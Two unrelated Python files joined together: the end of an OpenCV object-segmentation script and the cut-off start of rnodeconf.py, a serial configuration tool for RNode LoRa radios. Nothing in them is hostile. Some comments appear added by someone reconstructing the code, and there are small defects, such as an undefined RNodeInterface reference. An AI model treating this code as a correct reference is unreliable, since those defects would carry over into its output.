        compactness = (whiteCount/size)*100
    if compactness > 9:
        temp = ogSlice.copy()
        temp = cv2.GaussianBlur(ogSlice, (9, 9), cv2.BORDER_CONSTANT)
        temp = cv2.Canny(temp, 100, 175)
        size = np.size(temp)
        whiteCount = np.count_nonzero(temp)
        compactness = (whiteCount/size)*100
    if compactness < 6:
        temp = ogSlice.copy()
        temp = cv2.GaussianBlur(ogSlice, (5, 5), cv2.BORDER_CONSTANT)
        # threshold
        temp = cv2.Canny(temp, 150, 175)
        size = np.size(temp)
        whiteCount = np.count_nonzero(temp)
        compactness = (whiteCount/size)*100
    return temp


def fillSmallSpace(img, workerRange, x, y):
    # function fills in small gaps between 2 white pixels
    count = 0
    down = 0
    up = 0
    left = 0
    right = 0
    tempFalse = False
    for i in range(x+1, min(x+workerRange, len(img))):
        if img[i][y] != 0:
            if tempFalse != True:
                count += 1
                down += 1
                tempFalse = True
            break
    tempFalse = False
    for i in range(x-1, max(x-workerRange, -1), -1):
        if img[i][y] != 0:
            if tempFalse != True:
                count += 1
                up += 1
                tempFalse = True
            break
    if count == 2:
        return count
    else:
        count = 0
    tempFalse = False
    for i in range(y+1, min(y+workerRange, len(img[0])-1)):
        if img[x][i] != 0:
            if tempFalse != True:
                count += 1
                right += 1
                tempFalse = True
            break
    tempFalse = False
    for i in range(y-1, max(y-workerRange, -1), -1):
        if img[x][i] != 0:
            if tempFalse != True:
                count += 1
                left += 1
                tempFalse = True
            break
    return count


def smoothing(mask, lineImage, workerRange, x, y):
    # function looking for neighbours in 4 directions
    maskCount = 0
    lineCount = 0
    tempFalse = False
    for i in range(x+1, min(x+workerRange, len(mask))):
        if mask[i][y] != 0:
            if tempFalse != True:
                maskCount += 1
                tempFalse = True
            break
        elif lineImage[i][y] != 0:
            if tempFalse != True:
                lineCount += 1
                tempFalse = True
            break
    tempFalse = False
    for i in range(x-1, max(x-workerRange, -1), -1):
        if mask[i][y] != 0:
            if tempFalse != True:
                maskCount += 1
                tempFalse = True
            break
        elif lineImage[i][y] != 0:
            if tempFalse != True:
                lineCount += 1
                tempFalse = True
            break
    tempFalse = False
    for i in range(y+1, min(y+workerRange, len(mask[0])-1)):
        if mask[x][i] != 0:
            if tempFalse != True:
                maskCount += 1
                tempFalse = True
            break
        elif lineImage[x][i] != 0:
            if tempFalse != True:
                lineCount += 1
                tempFalse = True
            break
    tempFalse = False
    for i in range(y-1, max(y-workerRange, -1), -1):
        if mask[x][i] != 0:
            if tempFalse != True:
                maskCount += 1
                tempFalse = True
            break
        elif lineImage[x][i] != 0:
            if tempFalse != True:
                lineCount += 1
                tempFalse = True
            break
    return lineCount, maskCount


def run_algorithm(img, numb):
    H, W, _ = img.shape
    # creates black image from input image so it has the same dimensions
    black_image = np.zeros((H, W), np.uint8)

    # Detect objects inside input image
    blob = cv2.dnn.blobFromImage(img, swapRB=True)
    net.setInput(blob)
    # passes the image to the network and gets the binary masks
    boxes, masks = net.forward(["detection_out_final", "detection_masks"])
    # passes the image to the network and gets the output boxes
    _, _, boxes2 = net2.detect(img, confThreshold=boxThr)
    detection_count = boxes.shape[2]
    boundingBox = []
    # looks through all the detections of the network and skips over the ones
    # that are below the threshold
    for i in range(detection_count):
        box = boxes[0, 0, i]
        classID = int(box[1])
        confidence = box[2]
        if confidence < confsThr:
            continue
        # Get box coordinates
        box = boxes[0, 0, i, 3:7] * np.array([W, H, W, H])
        (x1, y1, x2, y2) = box.astype("int")
        # boundingBox.append([x1,y1,x2,y2])
        roi_Width = x2 - x1
        roi_Height = y2 - y1
        mask = masks[i, classID]
        mask = cv2.resize(mask, (roi_Width, roi_Height), interpolation=cv2.INTER_CUBIC)
        _, mask = cv2.threshold(mask, 0.6, 255, cv2.THRESH_BINARY)
        for i in range(len(mask)):
            for j in range(len(mask[0])):
                if mask[i][j] != 0:
                    black_image[i+y1][j+x1] = mask[i][j]

    for box in boxes2:
        boundingBox.append([box[0], box[1], box[2]+box[0], box[3]+box[1]])

    maxX = 0
    maxY = 0
    minX = len(img)*len(img[0])
    minY = len(img)*len(img[0])
    # finds the bounding region of all the bounding boxes
    for box in boundingBox:
        maxX = max(maxX, box[2])
        maxY = max(maxY, box[3])
        minX = min(minX, box[0])
        minY = min(minY, box[1])

    ogSlice = img[minY:maxY, minX:maxX]  # slice is set to the bounding area
    maskSlice = black_image[minY:maxY, minX:maxX]
    # assumed call: find_optimal_lines is the only (slice, numb) helper defined above
    ogSlice = find_optimal_lines(ogSlice, numb)
    ogSlice = cv2.dilate(ogSlice, (5, 5), iterations=3)
    # cv2.imshow("OG Slice ", ogSlice)
    newSlice = ogSlice.copy()
    newSlice.fill(0)
    for b in boundingBox:
        for i in range(b[0]-minX, (b[2])-minX):
            for j in range(b[1]-minY, (b[3])-minY):
                newSlice[j][i] = ogSlice[j][i]
    ogSlice = newSlice
    # cv2.imshow("OG Slice ", ogSlice)

    cpSlice = maskSlice.copy()
    workerRange = int(max(len(ogSlice)/10, len(ogSlice[0])/10))
    for i in range(len(ogSlice)):
        for j in range(len(ogSlice[0])):
            if maskSlice[i][j] != 255:
                workVal = smoothing(maskSlice, ogSlice, workerRange, i, j)
                if (workVal[0] >= 2 and workVal[1] >= 2) or (workVal[0] > 3):
                    cpSlice[i][j] = 255
                # elif workVal[0] > 3:
                #     cpSlice[i][j] = 255
    # ogSlice = cpSlice.copy()
    cpSlice2 = cpSlice.copy()
    cpSlice = cv2.bitwise_or(maskSlice, ogSlice)  # combining the images
    cpSlice = cv2.bitwise_or(cpSlice2, cpSlice)   # combining all the images
    # cpSlice = cpSlice2
    for i in range(len(cpSlice)):
        for j in range(len(cpSlice[0])):
            if maskSlice[i][j] != 255:
                workVal = fillSmallSpace(ogSlice, 2, i, j)
                if workVal == 2:
                    cpSlice[i][j] = 255

    nb_components, output, stats, centroids = cv2.connectedComponentsWithStats(cpSlice)
    sizes = stats[1:, -1]
    nb_components = nb_components - 1
    biggestObject = max(sizes)/2
    img2 = output.copy()
    img2.fill(0)
    # removal of objects that are smaller than half the size of the biggest
    # detected object
    for i in range(0, nb_components):
        if sizes[i] >= biggestObject:
            img2[output == i + 1] = 255
    for i in range(len(ogSlice)):
        for j in range(len(ogSlice[0])):
            cpSlice[i][j] = img2[i][j]

    maskSlice = cpSlice.copy()
    # imshow("Cp Slice", maskSlice)
    for i in range(len(ogSlice)):
        for j in range(len(ogSlice[0])):
            if maskSlice[i][j] != 255:
                workVal = smoothing(maskSlice, cpSlice, workerRange, i, j)
                if workVal[0] > 3 or workVal[1] > 3:
                    maskSlice[i][j] = 255
    cpSlice = maskSlice.copy()

    rmSlice = cpSlice.copy()
    drcontours = rmSlice.copy()
    drcontours = cv2.cvtColor(drcontours, cv2.COLOR_GRAY2RGB)
    removeIslands = cv2.pyrDown(rmSlice)
    _, threshed = cv2.threshold(rmSlice, 0, 255, cv2.THRESH_BINARY)
    contours, _ = cv2.findContours(threshed, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    # find maximum contour and draw
    cmax = max(contours, key=cv2.contourArea)
    epsilon = 0.002 * cv2.arcLength(cmax, True)
    approx = cv2.approxPolyDP(cmax, epsilon, True)
    cv2.drawContours(drcontours, [approx], -1, (0, 255, 0), 2)
    height, width = rmSlice.shape  # numpy shape order is (rows, cols)
    # imshow("Contour", drcontours)
    # waitKey(0)
    # fill maximum contour and draw
    removeIslands = np.zeros([height, width, 3], dtype=np.uint8)
    cv2.fillPoly(removeIslands, pts=[cmax], color=(255, 255, 255))  # removes small islands
    cpSlice = cv2.cvtColor(removeIslands, cv2.COLOR_BGR2GRAY)
    # waitKey(0)

    black_image_lines = black_image.copy()
    # black_image_lines.fill(0)
    for i in range(len(cpSlice)):
        for j in range(len(cpSlice[0])):
            if cpSlice[i][j] != 0:
                black_image_lines[i+minY][j+minX] = cpSlice[i][j]
    black_image = black_image_lines
    # for i in range(len(ogSlice)):
    #     for j in range(len(ogSlice[0])):
    #         if ogSlice[i][j] != 0:
    #             black_image_lines[i+minY][j+minX] = ogSlice[i][j]

    grey = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    # uses the binary mask as a guide to colour the spot colour region
    for i in range(len(img)):
        for j in range(len(img[0])):
            if black_image[i][j] != 255:
                img[i][j] = grey[i][j]
    print("Done with Image: ", numb)
    cv2.imshow("Image", img)
    cv2.imshow("Black image", black_image)
    # cv2.imshow("Black image lines", black_image_lines)
    # cv2.imwrite(data_path+"test_output\\v5\\"+str(numb)+"_thr.jpg", black_image)
    # cv2.imwrite(data_path+"test_output\\v5\\"+str(numb)+"_p.jpg", img)
    # cv2.imwrite(data_path+"train_output\\v5\\"+str(numb)+"_thr.jpg", black_image)
    # cv2.imwrite(data_path+"train_output\\v5\\"+str(numb)+"_p.jpg", img)
    # cv2.imwrite(data_path+"hypothesis\\v5\\"+str(numb)+"_thr.jpg", black_image)
    # cv2.imwrite(data_path+"hypothesis\\v5\\"+str(numb)+"_p.jpg", img)
    cv2.waitKey(0)


data_path = os.getcwd()+"\\"

# for i in range(1, 11):
#     # if i == 3:
#     #     continue
#     mask = cv2.imread("test_data\\"+str(i)+".jpg")
#     if __name__ == "__main__":
#         p1 = Process(target=run_algorithm, args=[mask, i])
#         p1.start()

# for i in range(1, 11):
#     # if i == 3:
#     #     continue
#     mask = cv2.imread("train_data\\"+str(i)+".jpg")
#     if __name__ == "__main__":
#         p1 = Process(target=run_algorithm, args=[mask, i])
#         p1.start()

for i in range(1, 8):
    mask = cv2.imread("hypothesis\\"+str(i)+".png")
    if __name__ == "__main__":
        p1 = Process(target=run_algorithm, args=[mask, i])
        p1.start()
rnodeconf.py
#!python3

# MIT License
#
# Copyright (c) 2018 Mark Qvist - unsigned.io/rnode
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.

from time import sleep
import argparse
import threading
import os
import os.path
import struct
import datetime
import time
import math
from urllib.request import urlretrieve
from importlib import util

program_version = "1.1.9"
eth_addr = "0x81F7B979fEa6134bA9FD5c701b3501A2e61E897a"
btc_addr = "3CPmacGm34qYvR6XWLVEJmi2aNe3PZqUuq"
xmr_addr = "87HcDx6jRSkMQ9nPRd5K9hGGpZLn2s7vWETjMaVM5KfV4TD36NcYa8J8WSxhTSvBzzFpqDwp2fg5GX2moZ7VAP9QMZCZGET"

rnode = None
rnode_serial = None
rnode_port = None
rnode_baudrate = 115200
known_keys = [
    ["unsigned.io", "30819f300d06092a864886f70d010101050003818d0030818902818100bf831ebd99f43b477caf1a094bec829389da40653e8f1f83fc14bf1b98a3e1cc70e759c213a43f71e5a47eb56a9ca487f241335b3e6ff7cdde0ee0a1c75c698574aeba0485726b6a9dfc046b4188e3520271ee8555a8f405cf21f81f2575771d0b0887adea5dd53c1f594f72c66b5f14904ffc2e72206a6698a490d51ba1105b0203010001"],
    ["unsigned.io", "30819f300d06092a864886f70d010101050003818d0030818902818100e5d46084e445595376bf7efd9c6ccf19d39abbc59afdb763207e4ff68b8d00ebffb63847aa2fe6dd10783d3ea63b55ac66f71ad885c20e223709f0d51ed5c6c0d0b093be9e1d165bb8a483a548b67a3f7a1e4580f50e75b306593fa6067ae259d3e297717bd7ff8c8f5b07f2bed89929a9a0321026cf3699524db98e2d18fb2d020300ff39"]
]
firmware_update_url = "https://github.com/markqvist/RNode_Firmware/raw/master/Release/"
fw_filename = None
mapped_model = None

class RNS():
    @staticmethod
    def log(msg):
        logtimefmt = "%Y-%m-%d %H:%M:%S"
        timestamp = time.time()
        logstring = "["+time.strftime(logtimefmt)+"] "+msg
        print(logstring)

    @staticmethod
    def hexrep(data, delimit=True):
        try:
            iter(data)
        except TypeError:
            data = [data]
        delimiter = ":"
        if not delimit:
            delimiter = ""
        hexrep = delimiter.join("{:02x}".format(c) for c in data)
        return hexrep

    @staticmethod
    def prettyhexrep(data):
        delimiter = ""
        hexrep = "<"+delimiter.join("{:02x}".format(c) for c in data)+">"
        return hexrep

class KISS():
    FEND            = 0xC0
    FESC            = 0xDB
    TFEND           = 0xDC
    TFESC           = 0xDD

    CMD_UNKNOWN     = 0xFE
    CMD_DATA        = 0x00
    CMD_FREQUENCY   = 0x01
    CMD_BANDWIDTH   = 0x02
    CMD_TXPOWER     = 0x03
    CMD_SF          = 0x04
    CMD_CR          = 0x05
    CMD_RADIO_STATE = 0x06
    CMD_RADIO_LOCK  = 0x07
    CMD_DETECT      = 0x08
    CMD_READY       = 0x0F
    CMD_STAT_RX     = 0x21
    CMD_STAT_TX     = 0x22
    CMD_STAT_RSSI   = 0x23
    CMD_STAT_SNR    = 0x24
    CMD_BLINK       = 0x30
    CMD_RANDOM      = 0x40
    CMD_BOARD       = 0x47
    CMD_PLATFORM    = 0x48
    CMD_MCU         = 0x49
    CMD_FW_VERSION  = 0x50
    CMD_ROM_READ    = 0x51
    CMD_ROM_WRITE   = 0x52
    CMD_ROM_WIPE    = 0x59
    CMD_CONF_SAVE   = 0x53
    CMD_CONF_DELETE = 0x54
    CMD_RESET       = 0x55

    DETECT_REQ      = 0x73
    DETECT_RESP     = 0x46

    RADIO_STATE_OFF = 0x00
    RADIO_STATE_ON  = 0x01
    RADIO_STATE_ASK = 0xFF

    CMD_ERROR           = 0x90
    ERROR_INITRADIO     = 0x01
    ERROR_TXFAILED      = 0x02
    ERROR_EEPROM_LOCKED = 0x03

    @staticmethod
    def escape(data):
        data = data.replace(bytes([0xdb]), bytes([0xdb, 0xdd]))
        data = data.replace(bytes([0xc0]), bytes([0xdb, 0xdc]))
        return data

class ROM():
    PLATFORM_AVR   = 0x90
    PLATFORM_ESP32 = 0x80

    MCU_1284P      = 0x91
    MCU_2560       = 0x92
    MCU_ESP32      = 0x81

    PRODUCT_RNODE  = 0x03
    MODEL_A4       = 0xA4
    MODEL_A9       = 0xA9

    PRODUCT_T32_20 = 0xB0
    MODEL_B3       = 0xB3
    MODEL_B8       = 0xB8

    PRODUCT_T32_21 = 0xB1
    MODEL_B4       = 0xB4
    MODEL_B9       = 0xB9

    PRODUCT_TBEAM  = 0xE0
    MODEL_E4       = 0xE4
    MODEL_E9       = 0xE9

    PRODUCT_HMBRW  = 0xF0
    MODEL_FF       = 0xFF

    ADDR_PRODUCT   = 0x00
    ADDR_MODEL     = 0x01
    ADDR_HW_REV    = 0x02
    ADDR_SERIAL    = 0x03
    ADDR_MADE      = 0x07
    ADDR_CHKSUM    = 0x0B
    ADDR_SIGNATURE = 0x1B
    ADDR_INFO_LOCK = 0x9B
    ADDR_CONF_SF   = 0x9C
    ADDR_CONF_CR   = 0x9D
    ADDR_CONF_TXP  = 0x9E
    ADDR_CONF_BW   = 0x9F
    ADDR_CONF_FREQ = 0xA3
    ADDR_CONF_OK   = 0xA7

    INFO_LOCK_BYTE = 0x73
    CONF_OK_BYTE   = 0x73

    BOARD_RNODE         = 0x31
    BOARD_HMBRW         = 0x32
    BOARD_TBEAM         = 0x33
    BOARD_HUZZAH32      = 0x34
    BOARD_GENERIC_ESP32 = 0x35
    BOARD_LORA32_V2_0   = 0x36
    BOARD_LORA32_V2_1   = 0x37

mapped_product = ROM.PRODUCT_RNODE

products = {
    ROM.PRODUCT_RNODE:  "RNode",
    ROM.PRODUCT_HMBRW:  "Homebrew RNode",
    ROM.PRODUCT_TBEAM:  "LilyGO T-Beam",
    ROM.PRODUCT_T32_20: "LilyGO LoRa32 v2.0",
    ROM.PRODUCT_T32_21: "LilyGO LoRa32 v2.1",
}

platforms = {
    ROM.PLATFORM_AVR:   "AVR",
    ROM.PLATFORM_ESP32: "ESP32",
}

mcus = {
    ROM.MCU_1284P: "ATmega1284P",
    ROM.MCU_2560:  "ATmega2560",
    ROM.MCU_ESP32: "Espressif Systems ESP32",
}

# model byte: [min freq Hz, max freq Hz, max TX power dBm, band label, firmware file]
models = {
    0xA4: [410000000, 525000000, 14, "410 - 525 MHz", "rnode_firmware_latest.hex"],
    0xA9: [820000000, 1020000000, 17, "820 - 1020 MHz", "rnode_firmware_latest.hex"],
    0xB3: [420000000, 520000000, 14, "420 - 520 MHz", "rnode_firmware_latest_lora32v20.zip"],
    0xB8: [850000000, 950000000, 17, "850 - 950 MHz", "rnode_firmware_latest_lora32v20.zip"],
    0xB4: [420000000, 520000000, 14, "420 - 520 MHz", "rnode_firmware_latest_lora32v21.zip"],
    0xB9: [850000000, 950000000, 17, "850 - 950 MHz", "rnode_firmware_latest_lora32v21.zip"],
    0xE4: [420000000, 520000000, 14, "420 - 520 MHz", "rnode_firmware_latest_tbeam.zip"],
    0xE9: [850000000, 950000000, 17, "850 - 950 MHz", "rnode_firmware_latest_tbeam.zip"],
    0xFF: [100000000, 1100000000, 14, "(Band capabilities unknown)", None],
}

squashvw = False

class RNode():
    def __init__(self, serial_instance):
        self.serial = serial_instance
        self.timeout = 100

        self.r_frequency = None
        self.r_bandwidth = None
        self.r_txpower = None
        self.r_sf = None
        self.r_state = None
        self.r_lock = None

        self.sf = None
        self.cr = None
        self.txpower = None
        self.frequency = None
        self.bandwidth = None

        self.detected = None

        self.platform = None
        self.mcu = None
        self.eeprom = None
        self.major_version = None
        self.minor_version = None
        self.version = None

        self.provisioned = None
        self.product = None
        self.board = None
        self.model = None
        self.hw_rev = None
        self.made = None
        self.serialno = None
        self.checksum = None
        self.signature = None
        self.signature_valid = False
        self.locally_signed = False
        self.vendor = None

        self.min_freq = None
        self.max_freq = None
        self.max_output = None

        self.configured = None
        self.conf_sf = None
        self.conf_cr = None
        self.conf_txpower = None
        self.conf_frequency = None
        self.conf_bandwidth = None

    def disconnect(self):
        self.serial.close()

    def readLoop(self):
        # KISS frame parser: FEND delimits frames, the first byte is the
        # command, FESC/TFEND/TFESC implement byte-stuffing.
        try:
            in_frame = False
            escape = False
            command = KISS.CMD_UNKNOWN
            data_buffer = b""
            command_buffer = b""
            last_read_ms = int(time.time()*1000)

            while self.serial.is_open:
                try:
                    data_waiting = self.serial.in_waiting
                except Exception as e:
                    data_waiting = False

                if data_waiting:
                    byte = ord(self.serial.read(1))
                    last_read_ms = int(time.time()*1000)

                    if (in_frame and byte == KISS.FEND and command == KISS.CMD_ROM_READ):
                        self.eeprom = data_buffer
                        in_frame = False
                        data_buffer = b""
                        command_buffer = b""
                    elif (byte == KISS.FEND):
                        in_frame = True
                        command = KISS.CMD_UNKNOWN
                        data_buffer = b""
                        command_buffer = b""
                    elif (in_frame and len(data_buffer) < 512):
                        if (len(data_buffer) == 0 and command == KISS.CMD_UNKNOWN):
                            command = byte
                        elif (command == KISS.CMD_ROM_READ):
                            if (byte == KISS.FESC):
                                escape = True
                            else:
                                if (escape):
                                    if (byte == KISS.TFEND):
                                        byte = KISS.FEND
                                    if (byte == KISS.TFESC):
                                        byte = KISS.FESC
                                    escape = False
                                data_buffer = data_buffer+bytes([byte])
                        elif (command == KISS.CMD_DATA):
                            if (byte == KISS.FESC):
                                escape = True
                            else:
                                if (escape):
                                    if (byte == KISS.TFEND):
                                        byte = KISS.FEND
                                    if (byte == KISS.TFESC):
                                        byte = KISS.FESC
                                    escape = False
                                data_buffer = data_buffer+bytes([byte])
                        elif (command == KISS.CMD_FREQUENCY):
                            if (byte == KISS.FESC):
                                escape = True
                            else:
                                if (escape):
                                    if (byte == KISS.TFEND):
                                        byte = KISS.FEND
                                    if (byte == KISS.TFESC):
                                        byte = KISS.FESC
                                    escape = False
                                command_buffer = command_buffer+bytes([byte])
                                if (len(command_buffer) == 4):
                                    self.r_frequency = command_buffer[0] << 24 | command_buffer[1] << 16 | command_buffer[2] << 8 | command_buffer[3]
                                    RNS.log("Radio reporting frequency is "+str(self.r_frequency/1000000.0)+" MHz")
                                    self.updateBitrate()
                        elif (command == KISS.CMD_BANDWIDTH):
                            if (byte == KISS.FESC):
                                escape = True
                            else:
                                if (escape):
                                    if (byte == KISS.TFEND):
                                        byte = KISS.FEND
                                    if (byte == KISS.TFESC):
                                        byte = KISS.FESC
                                    escape = False
                                command_buffer = command_buffer+bytes([byte])
                                if (len(command_buffer) == 4):
                                    self.r_bandwidth = command_buffer[0] << 24 | command_buffer[1] << 16 | command_buffer[2] << 8 | command_buffer[3]
                                    RNS.log("Radio reporting bandwidth is "+str(self.r_bandwidth/1000.0)+" KHz")
                                    self.updateBitrate()
                        elif (command == KISS.CMD_FW_VERSION):
                            if (byte == KISS.FESC):
                                escape = True
                            else:
                                if (escape):
                                    if (byte == KISS.TFEND):
                                        byte = KISS.FEND
                                    if (byte == KISS.TFESC):
                                        byte = KISS.FESC
                                    escape = False
                                command_buffer = command_buffer+bytes([byte])
                                if (len(command_buffer) == 2):
                                    self.major_version = command_buffer[0]
                                    self.minor_version = command_buffer[1]
                                    self.updateVersion()
                        elif (command == KISS.CMD_BOARD):
                            self.board = byte
                        elif (command == KISS.CMD_PLATFORM):
                            self.platform = byte
                        elif (command == KISS.CMD_MCU):
                            self.mcu = byte
                        elif (command == KISS.CMD_TXPOWER):
                            self.r_txpower = byte
                            RNS.log("Radio reporting TX power is "+str(self.r_txpower)+" dBm")
                        elif (command == KISS.CMD_SF):
                            self.r_sf = byte
                            RNS.log("Radio reporting spreading factor is "+str(self.r_sf))
                            self.updateBitrate()
                        elif (command == KISS.CMD_CR):
                            self.r_cr = byte
                            RNS.log("Radio reporting coding rate is "+str(self.r_cr))
                            self.updateBitrate()
                        elif (command == KISS.CMD_RADIO_STATE):
                            self.r_state = byte
                        elif (command == KISS.CMD_RADIO_LOCK):
                            self.r_lock = byte
                        elif (command == KISS.CMD_STAT_RX):
                            if (byte == KISS.FESC):
                                escape = True
                            else:
                                if (escape):
                                    if (byte == KISS.TFEND):
                                        byte = KISS.FEND
                                    if (byte == KISS.TFESC):
                                        byte = KISS.FESC
                                    escape = False
                                command_buffer = command_buffer+bytes([byte])
                                if (len(command_buffer) == 4):
                                    # indexing bytes yields ints in Python 3, so no ord() here
                                    self.r_stat_rx = command_buffer[0] << 24 | command_buffer[1] << 16 | command_buffer[2] << 8 | command_buffer[3]
                        elif (command == KISS.CMD_STAT_TX):
                            if (byte == KISS.FESC):
                                escape = True
                            else:
                                if (escape):
                                    if (byte == KISS.TFEND):
                                        byte = KISS.FEND
                                    if (byte == KISS.TFESC):
                                        byte = KISS.FESC
                                    escape = False
                                command_buffer = command_buffer+bytes([byte])
                                if (len(command_buffer) == 4):
                                    self.r_stat_tx = command_buffer[0] << 24 | command_buffer[1] << 16 | command_buffer[2] << 8 | command_buffer[3]
                        elif (command == KISS.CMD_STAT_RSSI):
                            self.r_stat_rssi = byte-RNodeInterface.RSSI_OFFSET
                        elif (command == KISS.CMD_STAT_SNR):
                            self.r_stat_snr = int.from_bytes(bytes([byte]), byteorder="big", signed=True) * 0.25
                        elif (command == KISS.CMD_RANDOM):
                            self.r_random = byte
                        elif (command == KISS.CMD_ERROR):
                            if (byte == KISS.ERROR_INITRADIO):
                                RNS.log(str(self)+" hardware initialisation error (code "+RNS.hexrep(byte)+")")
                            elif (byte == KISS.ERROR_TXFAILED):
                                RNS.log(str(self)+" hardware TX error (code "+RNS.hexrep(byte)+")")
                            else:
                                RNS.log(str(self)+" hardware error (code "+RNS.hexrep(byte)+")")
                        elif (command == KISS.CMD_DETECT):
                            if byte == KISS.DETECT_RESP:
                                self.detected = True
                            else:
                                self.detected = False
                else:
                    time_since_last = int(time.time()*1000) - last_read_ms
                    if len(data_buffer) > 0 and time_since_last > self.timeout:
                        RNS.log(str(self)+" serial read timeout")
                        data_buffer = b""
                        in_frame = False
                        command = KISS.CMD_UNKNOWN
                        escape = False
                    sleep(0.08)
        except Exception as e:
            raise e
            exit()

    def updateBitrate(self):
        try:
            self.bitrate = self.r_sf * ( (4.0/self.r_cr) / (math.pow(2, self.r_sf)/(self.r_bandwidth/1000)) ) * 1000
            self.bitrate_kbps = round(self.bitrate/1000.0, 2)
        except Exception as e:
            self.bitrate = 0

    def updateVersion(self):
        minstr = str(self.minor_version)
        if len(minstr) == 1:
            minstr = "0"+minstr
        self.version = str(self.major_version)+"."+minstr

    def detect(self):
        kiss_command = bytes([KISS.FEND, KISS.CMD_DETECT, KISS.DETECT_REQ, KISS.FEND,
                              KISS.CMD_FW_VERSION, 0x00, KISS.FEND,
                              KISS.CMD_PLATFORM, 0x00, KISS.FEND,
                              KISS.CMD_MCU, 0x00, KISS.FEND,
                              KISS.CMD_BOARD, 0x00, KISS.FEND])
        written = self.serial.write(kiss_command)
        if written != len(kiss_command):
            raise IOError("An IO error occurred while detecting hardware for "+str(self))

    def initRadio(self):
        self.setFrequency()
        self.setBandwidth()
        self.setTXPower()
        self.setSpreadingFactor()
        self.setCodingRate()
        self.setRadioState(KISS.RADIO_STATE_ON)

    def setFrequency(self):
        c1 = self.frequency >> 24
        c2 = self.frequency >> 16 & 0xFF
        c3 = self.frequency >> 8 & 0xFF
        c4 = self.frequency & 0xFF
        data = KISS.escape(bytes([c1])+bytes([c2])+bytes([c3])+bytes([c4]))
        kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_FREQUENCY])+data+bytes([KISS.FEND])
        written = self.serial.write(kiss_command)
        if written != len(kiss_command):
            raise IOError("An IO error occurred while configuring frequency for "+str(self))

    def setBandwidth(self):
        c1 = self.bandwidth >> 24
        c2 = self.bandwidth >> 16 & 0xFF
        c3 = self.bandwidth >> 8 & 0xFF
        c4 = self.bandwidth & 0xFF
        data = KISS.escape(bytes([c1])+bytes([c2])+bytes([c3])+bytes([c4]))
        kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_BANDWIDTH])+data+bytes([KISS.FEND])
        written = self.serial.write(kiss_command)
        if written != len(kiss_command):
            raise IOError("An IO error occurred while configuring bandwidth for "+str(self))

    def setTXPower(self):
        txp = bytes([self.txpower])
        kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_TXPOWER])+txp+bytes([KISS.FEND])
        written = self.serial.write(kiss_command)
        if written != len(kiss_command):
            raise IOError("An IO error occurred while configuring TX power for "+str(self))

    def setSpreadingFactor(self):
        sf = bytes([self.sf])
        kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_SF])+sf+bytes([KISS.FEND])
        written = self.serial.write(kiss_command)
        if written != len(kiss_command):
            raise IOError("An IO error occurred while configuring spreading factor for "+str(self))

    def setCodingRate(self):
        cr = bytes([self.cr])
        kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_CR])+cr+bytes([KISS.FEND])
        written = self.serial.write(kiss_command)
        if written != len(kiss_command):
            raise IOError("An IO error occurred while configuring coding rate for "+str(self))

    def setRadioState(self, state):
        kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_RADIO_STATE])+bytes([state])+bytes([KISS.FEND])
        written = self.serial.write(kiss_command)
        if written != len(kiss_command):
            raise IOError("An IO error occurred while configuring radio state for "+str(self))

    def setNormalMode(self):
        kiss_command = bytes([KISS.FEND, KISS.CMD_CONF_DELETE, 0x00, KISS.FEND])
        written = self.serial.write(kiss_command)
        if written != len(kiss_command):
            raise IOError("An IO error occurred while configuring device mode")

    def setTNCMode(self):
        kiss_command = bytes([KISS.FEND, KISS.CMD_CONF_SAVE, 0x00, KISS.FEND])
        written = self.serial.write(kiss_command)
        if written != len(kiss_command):
            raise IOError("An IO error occurred while configuring device mode")

    def wipe_eeprom(self):
        kiss_command = bytes([KISS.FEND, KISS.CMD_ROM_WIPE, 0xf8, KISS.FEND])
        written = self.serial.write(kiss_command)
        if written != len(kiss_command):
            raise IOError("An IO error occurred while wiping EEPROM")
        sleep(13)

    def hard_reset(self):
        kiss_command = bytes([KISS.FEND, KISS.CMD_RESET, 0xf8, KISS.FEND])
        written = self.serial.write(kiss_command)
        if written != len(kiss_command):
            raise IOError("An IO error occurred while restarting device")
        sleep(2)

    def write_eeprom(self, addr, byte):
        write_payload = b"" + bytes([addr, byte])
        write_payload = KISS.escape(write_payload)
        kiss_command = bytes([KISS.FEND, KISS.CMD_ROM_WRITE]) + write_payload + bytes([KISS.FEND])
        written = self.serial.write(kiss_command)
        if written != len(kiss_command):
            raise IOError("An IO error occurred while writing EEPROM")

    def download_eeprom(self):
        self.eeprom = None
        kiss_command = bytes([KISS.FEND, KISS.CMD_ROM_READ, 0x00, KISS.FEND])
        written = self.serial.write(kiss_command)
        if written != len(kiss_command):
            raise IOError("An IO error occurred while configuring radio state")

        sleep(0.2)
        if self.eeprom == None:
            RNS.log("Could not download EEPROM from device. Is a valid firmware installed?")
            exit()
        else:
            self.parse_eeprom()

    def parse_eeprom(self):
        global squashvw
        try:
            if self.eeprom[ROM.ADDR_INFO_LOCK] == ROM.INFO_LOCK_BYTE:
                from cryptography.hazmat.primitives import hashes
                from cryptography.hazmat.backends import default_backend

                self.provisioned = True

                self.product = self.eeprom[ROM.ADDR_PRODUCT]
                self.model = self.eeprom[ROM.ADDR_MODEL]
                self.hw_rev = self.eeprom[ROM.ADDR_HW_REV]
